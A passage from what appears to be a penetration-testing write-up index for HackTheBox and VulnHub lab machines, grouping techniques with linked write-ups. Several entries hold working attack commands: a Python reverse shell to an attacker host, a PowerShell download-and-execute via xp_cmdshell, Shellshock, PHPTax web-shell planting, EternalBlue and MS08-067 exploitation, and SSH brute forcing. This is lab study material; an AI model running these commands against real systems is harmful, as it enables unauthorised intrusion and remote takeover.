[`privesc_bash_reverseshell`](https://github.com/7h3rAm/writeups#privesc_bash_reverseshell) | | 5. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 6. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_php_webshell"></a> #### exploit_php_webshell [⇡](#exploit) use the php web shell to execute arbitrary commands and gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Misdirection: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/writeup.pdf) | [vh#371](https://www.vulnhub.com/entry/misdirection-1,371/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.misdirection1/killchain.png" width="100" height="100" /> | [`exploit_php_webshell`](https://github.com/7h3rAm/writeups#exploit_php_webshell), [`exploit_bash_reverseshell`](https://github.com/7h3rAm/writeups#exploit_bash_reverseshell), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers), [`privesc_passwd_writable`](https://github.com/7h3rAm/writeups#privesc_passwd_writable) | --- <a name="exploit_phptax"></a> #### exploit_phptax [⇡](#exploit) the `Phptax 0.8` web application is vulnerable to remote code execution ```shell GET /phptax/index.php?field=rce.php&newvalue=%3C%3Fphp%20passthru(%24_GET%5Bcmd%5D)%3B%3F%3E HTTP/1.1 Host: <targetip>:<targetport> User-Agent: Mozilla/4.0 (X11; Linux i686; rv:60.0) Gecko/20100101 Firefox/60.0 GET /phptax/data/rce.php?cmd=uname%20-a HTTP/1.1 Host: <targetip>:<targetport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Kioptrix: 2014 (#5)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/writeup.pdf) | [vh#62](https://www.vulnhub.com/entry/kioptrix-2014-5,62/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix5/killchain.png" width="100" height="100" /> | [`exploit_pchart`](https://github.com/7h3rAm/writeups#exploit_pchart), [`exploit_phptax`](https://github.com/7h3rAm/writeups#exploit_phptax), [`privesc_freebsd`](https://github.com/7h3rAm/writeups#privesc_freebsd) | [+] https://www.exploit-db.com/exploits/25849 --- <a name="exploit_prtg_sensors"></a> #### exploit_prtg_sensors [⇡](#exploit) execute a reverse shell command through prtg sensor creation dialog and play it to get interactive access on the target system ```shell ./46527.sh -u http://<targetip> -c "<prtg session cookie>" psexec.py [email protected] ``` [+] https://www.exploit-db.com/exploits/46527 [+] https://nvd.nist.gov/vuln/detail/CVE-2018-9276 [+] https://hipotermia.pw/htb/netmon [+] https://snowscan.io/htb-writeup-netmon/# --- <a name="exploit_psexec_login"></a> #### exploit_psexec_login [⇡](#exploit) If credentials for a non-administrative user are available, we can use `psexec.py` to connect and gain interactive access to the target system. ```shell psexec <username>@<targetip> ``` --- <a name="exploit_python_reverseshell"></a> #### exploit_python_reverseshell [⇡](#exploit) use a python reverse shell to gain interactive access on the target system ```shell nc -nlvp 9999 http://<targetip>/shell.php?cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attackerip>",<attackerport>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Bashed](https://github.com/7h3rAm/writeups/blob/master/htb.bashed/writeup.pdf) | [htb#118](https://app.hackthebox.eu/machines/118) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.bashed/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_cron_rootjobs`](https://github.com/7h3rAm/writeups#privesc_cron_rootjobs) | | 2. | [Escalate_Linux: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/writeup.pdf) | [vh#323](https://www.vulnhub.com/entry/escalate_linux-1,323/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.escalatelinux/killchain.png" width="100" height="100" /> | [`exploit_python_reverseshell`](https://github.com/7h3rAm/writeups#exploit_python_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_setuid`](https://github.com/7h3rAm/writeups#privesc_setuid) | [+] http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet [+] https://highon.coffee/blog/reverse-shell-cheat-sheet/#python-reverse-shell --- <a name="exploit_shellshock"></a> #### exploit_shellshock [⇡](#exploit) ```shell curl -H "user-agent: () { :; }; echo; echo; /bin/bash -c 'cat /etc/passwd'" http://<targetip>/cgi-bin/user.sh nmap -sV -p- --script http-shellshock --script-args uri=/cgi-bin/bin,cmd=ls <targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Shocker](https://github.com/7h3rAm/writeups/blob/master/htb.shocker/writeup.pdf) | [htb#108](https://app.hackthebox.eu/machines/108) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.shocker/killchain.png" width="100" height="100" /> | [`exploit_shellshock`](https://github.com/7h3rAm/writeups#exploit_shellshock), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | [+] https://zayotic.com/posts/oscp-reference/ [+] https://highon.coffee/blog/shellshock-pen-testers-lab-walkthrough/ [+] https://blog.knapsy.com/blog/2014/10/07/basic-shellshock-exploitation/ --- <a name="exploit_smb_ms08_067"></a> #### exploit_smb_ms08_067 [⇡](#exploit) (netapi exploit) for microsoft windows xp systems with open smb ports, use the [ms08-067](https://github.com/andyacer/ms08_067) metasploit module [`windows/smb/ms08_067_netapi`]() ```shell scan: nmap -v -p 139,445 --script=smb-check-vulns --script-args=unsafe=1 <targetip> msfcli auxiliary/scanner/smb/ms08_067_check rhosts=<targetip> threads=100 E manual_a: wget https://raw.githubusercontent.com/andyacer/ms08_067/master/ms08_067_2018.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -b "\x00\x0a\x0d\x5c\x5f\x2f\x2e\x40" -f c -a x86 --platform windows nc -nlvp <attackerport> python ms08_067_2018.py <targetip> <osid> <targetport> manual_b: searchsploit ms08-067 python /usr/share/exploitdb/platforms/windows/remote/7132.py <targetip> 1 msf: use exploit/windows/smb/ms08_067_netapi set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Legacy](https://github.com/7h3rAm/writeups/blob/master/htb.legacy/writeup.pdf) | [htb#2](https://app.hackthebox.eu/machines/2) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.legacy/killchain.png" width="100" height="100" /> | [`exploit_smb_ms08_067`](https://github.com/7h3rAm/writeups#exploit_smb_ms08_067) | [+] https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067 [+] https://github.com/andyacer/ms08_067 [+] https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py [+] https://blog.rapid7.com/2014/02/03/new-ms08-067/ [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html --- <a name="exploit_smb_ms17_010"></a> #### exploit_smb_ms17_010 [⇡](#exploit) (eternalblue exploit) for microsoft windows system with smb v1 enbaled, use the metasploit exploit `windows/smb/ms17_010_eternalblue` ```shell nmap -p 445 -script smb-check-vulns -script-args=unsafe=1 <targetip> manual: wget https://raw.githubusercontent.com/helviojunior/MS17-010/master/send_and_execute.py msfvenom -p windows/shell_reverse_tcp LHOST=<attackerip> LPORT=<attackerport> EXITFUNC=thread -f exe -a x86 --platform windows -o revshell.exe nc -nlvp <attackerport> python send_and_execute.py <targetip> revshell.exe msf: use exploit/windows/smb/ms17_010_eternalblue set RHOST <targetip> set LHOST <attackerip> show options exploit ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blue](https://github.com/7h3rAm/writeups/blob/master/htb.blue/writeup.pdf) | [htb#51](https://app.hackthebox.eu/machines/51) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blue/killchain.png" width="100" height="100" /> | [`exploit_smb_ms17_010`](https://github.com/7h3rAm/writeups#exploit_smb_ms17_010) | [+] https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010 [+] https://www.rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalblue [+] https://0xdf.gitlab.io/2019/02/21/htb-legacy.html [+] https://github.com/helviojunior/MS17-010/send_and_execute.py --- <a name="exploit_smb_nullsession"></a> #### exploit_smb_nullsession [⇡](#exploit) smb null sessions leak a lot of sensitive information about the target system. it could be useful to access open shares or to get sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_smb_usermap"></a> #### exploit_smb_usermap [⇡](#exploit) samba 3.0.0 - 3.0.25rc3 is vulnerable to remote command execution ```shell nc -nlvp <attackerport> sudo apt install python python-pip pip install --user pysmb git clone https://github.com/amriunix/CVE-2007-2447.git cd CVE-2007-2447/ python usermap_script.py <targetip> 139 <attackerip> <attackerport> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lame](https://github.com/7h3rAm/writeups/blob/master/htb.lame/writeup.pdf) | [htb#1](https://app.hackthebox.eu/machines/1) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.lame/killchain.png" width="100" height="100" /> | [`exploit_smb_usermap`](https://github.com/7h3rAm/writeups#exploit_smb_usermap) | [+] https://nvd.nist.gov/vuln/detail/CVE-2007-2447 [+] https://github.com/amriunix/CVE-2007-2447 --- <a name="exploit_smb_web_root"></a> #### exploit_smb_web_root [⇡](#exploit) smb shared directory is mapped to the web server's root directory. read files to obtain sensitive information or upload a reverse shell file native to the web server and trigger it's execution to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`exploit_wordpress_template`](https://github.com/7h3rAm/writeups#exploit_wordpress_template), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo) | --- <a name="exploit_sql_login"></a> #### exploit_sql_login [⇡](#exploit) login to the target system using a sql service account ```shell mssqlclient.py -windows-auth "<username>@<targetip>" ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sql_xpcmdshell"></a> #### exploit_sql_xpcmdshell [⇡](#exploit) use the SQL xp_cmdshell method to gain command execution on the target system ```shell SELECT IS_SRVROLEMEMBER('sysadmin') ## check if current sql user has db sysadmin role, continue if true EXEC sp_configure 'Show Advanced Options', 1; reconfigure; sp_configure; EXEC sp_configure 'xp_cmdshell', 1 reconfigure; xp_cmdshell "whoami" type shell.ps1 ## create a powershell reverse shell xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString(\"http://<attackerip>/shell.ps1\");" python3 -m http.server 80 ## serve the reverse shell via http ufw allow from <targetip> proto tcp to any port 80,<attackerport> ## allow incoming connection from <targetip> nc -nlvp <attackerport> ## listen for incoming reverse shell connection ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Archetype](https://github.com/7h3rAm/writeups/blob/master/htb.archetype/writeup.pdf) | [htb#287](https://app.hackthebox.eu/machines/287) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.archetype/killchain.png" width="100" height="100" /> | [`enumerate_proto_smb`](https://github.com/7h3rAm/writeups#enumerate_proto_smb), [`enumerate_proto_smb_anonymous_access`](https://github.com/7h3rAm/writeups#enumerate_proto_smb_anonymous_access), [`enumerate_proto_sql`](https://github.com/7h3rAm/writeups#enumerate_proto_sql), [`enumerate_proto_sql_ssis_dtsconfig`](https://github.com/7h3rAm/writeups#enumerate_proto_sql_ssis_dtsconfig), [`exploit_sql_login`](https://github.com/7h3rAm/writeups#exploit_sql_login), [`exploit_sql_xpcmdshell`](https://github.com/7h3rAm/writeups#exploit_sql_xpcmdshell), [`enumerate_app_powershell_history`](https://github.com/7h3rAm/writeups#enumerate_app_powershell_history), [`privesc_psexec_login`](https://github.com/7h3rAm/writeups#privesc_psexec_login) | --- <a name="exploit_sqli"></a> #### exploit_sqli [⇡](#exploit) target system is running a webapp that's vulnerable to sql injection ```shell sqlmap -u "http://<targetip>:<targetport>/<vulnwebapp>/index.php" --batch --forms --dump ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [CronOS](https://github.com/7h3rAm/writeups/blob/master/htb.cronos/writeup.pdf) | [htb#11](https://app.hackthebox.eu/machines/11) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.cronos/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron) | | 2. | [Lord Of The Root: 1.0.1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/writeup.pdf) | [vh#129](https://www.vulnhub.com/entry/lord-of-the-root-101,129/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lordoftheroot101/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_kernel_overlayfs`](https://github.com/7h3rAm/writeups#privesc_kernel_overlayfs), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 3. | [Kioptrix: Level 1.3 (#4)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/writeup.pdf) | [vh#25](https://www.vulnhub.com/entry/kioptrix-level-13-4,25/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix4/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_shell_escape`](https://github.com/7h3rAm/writeups#privesc_shell_escape), [`privesc_mysql_root`](https://github.com/7h3rAm/writeups#privesc_mysql_root), [`privesc_mysql_udf`](https://github.com/7h3rAm/writeups#privesc_mysql_udf) | | 4. | [Kioptrix: Level 1.1 (#2)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/writeup.pdf) | [vh#23](https://www.vulnhub.com/entry/kioptrix-level-11-2,23/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.kioptrix2/killchain.png" width="100" height="100" /> | [`exploit_sqli`](https://github.com/7h3rAm/writeups#exploit_sqli), [`exploit_cmdexec`](https://github.com/7h3rAm/writeups#exploit_cmdexec), [`privesc_kernel_ipappend`](https://github.com/7h3rAm/writeups#privesc_kernel_ipappend) | --- <a name="exploit_ssh_authorizedkeys"></a> #### exploit_ssh_authorizedkeys [⇡](#exploit) if we have access to a user's `.ssh` directory, copy our `id_rsa.pub` file to `.ssh/authorized_keys` to obtain passwordless ssh access | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Lin.Security: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/writeup.pdf) | [vh#244](https://www.vulnhub.com/entry/linsecurity-1,244/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.linsecurity1/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_strace_setuid`](https://github.com/7h3rAm/writeups#privesc_strace_setuid), [`privesc_docker_group`](https://github.com/7h3rAm/writeups#privesc_docker_group) | | 2. | [HackLAB: Vulnix](https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/writeup.pdf) | [vh#48](https://www.vulnhub.com/entry/hacklab-vulnix,48/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.vulnix/killchain.png" width="100" height="100" /> | [`exploit_nfs_rw`](https://github.com/7h3rAm/writeups#exploit_nfs_rw), [`exploit_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#exploit_ssh_authorizedkeys), [`privesc_nfs_norootsquash`](https://github.com/7h3rAm/writeups#privesc_nfs_norootsquash), [`privesc_ssh_authorizedkeys`](https://github.com/7h3rAm/writeups#privesc_ssh_authorizedkeys) | --- <a name="exploit_ssh_bruteforce"></a> #### exploit_ssh_bruteforce [⇡](#exploit) use hydra to bruteforce ssh password for a know user ```shell hydra -l anne -P "/usr/share/wordlists/rockyou.txt" -e nsr -s 22 ssh://<targetip> ``` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_ssh_privatekeys"></a> #### exploit_ssh_privatekeys [⇡](#exploit) | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [InfoSec Prep: OSCP](https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/writeup.pdf) | [vh#508](https://www.vulnhub.com/entry/infosec-prep-oscp,508/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.infosecpreposcp/killchain.png" width="100" height="100" /> | [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`exploit_ssh_privatekeys`](https://github.com/7h3rAm/writeups#exploit_ssh_privatekeys), [`privesc_lxc_bash`](https://github.com/7h3rAm/writeups#privesc_lxc_bash) | --- <a name="exploit_ssl_heartbleed"></a> #### exploit_ssl_heartbleed [⇡](#exploit) use nmap nse script to confirm heartbleed vulnerability and then sensepost exploit to dump memory from target system ```shell nmap --script=ssl-heartbleed -p <targetport> <targetip> python $HOME/toolbox/scripts/heartbleed-poc/heartbleed-poc.py -n10 -f dump.bin <targetip> -p <targetport> strings dump.bin ``` [+] https://github.com/sensepost/heartbleed-poc --- <a name="exploit_wordpress_defaultcreds"></a> #### exploit_wordpress_defaultcreds [⇡](#exploit) target system has wordpress configured with default credentials `admin/admin` | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | --- <a name="exploit_wordpress_plugin"></a> #### exploit_wordpress_plugin [⇡](#exploit) certain wordpress installations might have a `/plugins/` directory that could provide source files or leak sensitive information | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [Blocky](https://github.com/7h3rAm/writeups/blob/master/htb.blocky/writeup.pdf) | [htb#48](https://app.hackthebox.eu/machines/48) | <img src="https://github.com/7h3rAm/writeups/blob/master/htb.blocky/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_plugin_activitymonitor"></a> #### exploit_wordpress_plugin_activitymonitor [⇡](#exploit) wordpress plugin `Plainview Activity Monitor` is vulnerable to remote command injection | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [DC: 6](https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/writeup.pdf) | [vh#315](https://www.vulnhub.com/entry/dc-6,315/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.dc6/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_activitymonitor`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_activitymonitor), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_sudo`](https://github.com/7h3rAm/writeups#privesc_sudo), [`privesc_nmap`](https://github.com/7h3rAm/writeups#privesc_nmap) | [+] https://www.exploit-db.com/exploits/45274 --- <a name="exploit_wordpress_plugin_hellodolly"></a> #### exploit_wordpress_plugin_hellodolly [⇡](#exploit) wordpress plugin `Hello Dolly` (default on stock wp installs) file `hello.php` is modified with php reverse shell code to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [hackfest2016: Quaoar](https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/writeup.pdf) | [vh#180](https://www.vulnhub.com/entry/hackfest2016-quaoar,180/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.quaoar/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_defaultcreds`](https://github.com/7h3rAm/writeups#exploit_wordpress_defaultcreds), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_mysql_creds`](https://github.com/7h3rAm/writeups#privesc_mysql_creds), [`privesc_credsreuse`](https://github.com/7h3rAm/writeups#privesc_credsreuse) | | 2. | [BSides Vancouver: 2018 (Workshop)](https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/writeup.pdf) | [vh#231](https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.bsidesvancouver2018workshop/killchain.png" width="100" height="100" /> | [`enumerate_proto_ftp`](https://github.com/7h3rAm/writeups#enumerate_proto_ftp), [`enumerate_proto_ssh`](https://github.com/7h3rAm/writeups#enumerate_proto_ssh), [`exploit_ssh_bruteforce`](https://github.com/7h3rAm/writeups#exploit_ssh_bruteforce), [`enumerate_proto_http`](https://github.com/7h3rAm/writeups#enumerate_proto_http), [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_wordpress_plugin_hellodolly`](https://github.com/7h3rAm/writeups#exploit_wordpress_plugin_hellodolly), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`privesc_cron`](https://github.com/7h3rAm/writeups#privesc_cron), [`privesc_sudoers`](https://github.com/7h3rAm/writeups#privesc_sudoers) | --- <a name="exploit_wordpress_template"></a> #### exploit_wordpress_template [⇡](#exploit) edit a wordpress template file, like `404.php` and add php reverse shell code within it to gain interactive access on the target system | # | Name | Infra | Killchain | TTPs | |---|------|-------|-----------|------| | 1. | [LazySysAdmin: 1](https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/writeup.pdf) | [vh#205](https://www.vulnhub.com/entry/lazysysadmin-1,205/) | <img src="https://github.com/7h3rAm/writeups/blob/master/vulnhub.lazysysadmin1/killchain.png" width="100" height="100" /> | [`enumerate_app_wordpress`](https://github.com/7h3rAm/writeups#enumerate_app_wordpress), [`exploit_smb_nullsession`](https://github.com/7h3rAm/writeups#exploit_smb_nullsession), [`exploit_smb_web_root`](https://github.com/7h3rAm/writeups#exploit_smb_web_root), [`exploit_php_reverseshell`](https://github.com/7h3rAm/writeups#exploit_php_reverseshell), [`exploit_credsreuse`](https://github.com/7h3rAm/writeups#exploit_credsreuse), 